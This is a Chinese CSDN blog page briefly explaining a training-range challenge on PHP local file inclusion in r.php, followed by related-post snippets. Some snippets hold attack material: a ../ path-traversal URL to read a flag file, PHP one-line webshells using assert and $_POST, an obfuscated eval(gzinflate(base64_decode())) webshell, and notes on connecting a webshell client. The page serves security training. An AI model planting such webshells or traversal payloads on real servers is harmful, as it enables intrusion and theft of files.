PHP本地包含漏洞代码溯源

最新推荐文章于 2023-03-05 20:14:49 发布
最新推荐文章于 2023-03-05 20:14:49 发布
阅读量311 收藏
点赞数
分类专栏: 文件包含 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127171749
版权

漏洞简介

在这里插入图片描述

本地包含漏洞是在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等

漏洞复现

F12或右键查看源码,发现r.php的源码
在这里插入图片描述
由于参数p没有做任何校验,从而形成本地包含漏洞。
在这里插入图片描述

Yolo山药
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-PHP本地包含漏洞代码溯源
JimWu的博客
09-04 313
PHP本地包含漏洞代码溯源 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器 1.打开靶场,了解本地包含漏洞。 本地包含漏洞是在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等 2.F12或右键查看源码,发现r.php的源码。 由于参数p没有做任何校验,从而形成本地包含漏洞。 3.构造url为/...
关于推动可追溯代码来源的计划
Gefangenes的博客
07-21 258
设计一个引入链接的代码块可以考虑以下格式:```java [链接名](链接地址)// 代码内容```这样就可以在代码块中添加一个链接,链接名将显示为可点击的文本,点击后会跳转到指定的链接地址。代码块中同时指定起始行和高亮行数你可以考虑以下格式:```java {起始行号}-{结束行号} {高亮行号1} {高亮行号2} ...代码内容");// 第4行高亮");// 第5行高亮在上述示例中,起始行号为3,结束行号为空,表示从第3行到代码块结束的所有行。
PHP<=7.4.21 Development Server源码泄露漏洞
这周末在做梦的博客
03-05 3476
因为特殊的原因CTF荒废了一段时间,近期总算再次捡了起来,算是从头开始了吧。近期比赛刚好遇到了这个漏洞,看国内似乎还没有过多的论述,先总结一波。
利用本地包含漏洞执行任意代码
热门推荐
cnbird's blog
01-19 2万+
1 概述   文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
PHP魔众一物一码溯源防伪系统 v2.0.0
最新发布
10-21
魔众一物一码溯源防伪系统支持批量生成、管理防伪码、溯源码,帮助您更好的管理商品防伪码。 魔众一物一码溯源防伪系统,溯源、防伪、一物一码,一套搞定。
代码溯源技术及开源软件的继承性分析1
08-03
研究背景在供应链全球化的背景下,授权 / 开源模式已成为重要的软件开发模式。的企业软件系统中引入了开源软件与此同时,在芯片领域,通过 IP 授权、架构授权和开源
WebShell文件上传漏洞分析溯源(第3题)
02-22
WebShell 文件上传漏洞分析溯源 本文将对 WebShell 文件上传漏洞进行深入分析,探讨其原理、危害性以及防御方法。同时,通过实践演示,展示如何绕过页面对可执行文件上传的限制,利用 WebShell 读取服务器上的源...
PHP魔众一物一码溯源防伪系统 v2.1.0
08-15
php源码 魔众一物一码溯源防伪系统支持批量生成、管理防伪码、溯源码,帮助您更好的管理商品防伪码。 魔众一物一码溯源防伪系统,溯源、防伪、一物一码,一套搞定。 2022年10月19日魔众一物一码溯源防伪系统发布v...
墨者学院 - PHP本地包含漏洞代码溯源
多崎巡礼的博客
09-25 716
  根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_here done
墨者学院——PHP本地包含漏洞代码溯源
qq_43731011的博客
09-20 394
过关地址 启动环境,进入网址后,在html源码中找到提示 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; } ?&gt...
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1034
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
墨者学院 - WebShell代码分析溯源(第2题)
多崎巡礼的博客
07-31 742
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
WEBWebShell代码分析溯源(第4题)
HAPPY
08-19 1165
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
WebShell代码分析溯源(第1题)
qq_36933272的博客
09-04 160
下载源码包,用nodepad++一个一个看,发现cn-right.php存在变形的一句话木马 菜刀连接,地址http://219.153.49.228:45566/www/cn-right.php?POST=assert,密码有一句话木马得知是GET 连接成功,发现key的php文件,打开得到key ...
墨者PHP代码分析溯源(第4题)题解
zr1213159840的博客
01-16 601
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
php 追溯,一次简单的数据库追溯
weixin_31682031的博客
03-11 100
引子 .今天排查代码,一路飞,到数据库,1$this->slave()->select('sina_user_id, sina_nickname, password')->from(self::Table_User_Info)显然到这里确定了表.user_info;这个文件没有load->database();顾名: slave() 是从库,追溯slave() 果然在这里...
恶意代码演化与溯源技术研究.pdf
12-16
同时,恶意代码的传播方式也在不断进化,从传统的邮件附件到利用漏洞的快速传播,再到社交媒体和云服务的滥用,这增加了溯源的难度。 文章接着详细介绍了学术界和产业界在恶意代码溯源技术上的研究进展。学术界侧重...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值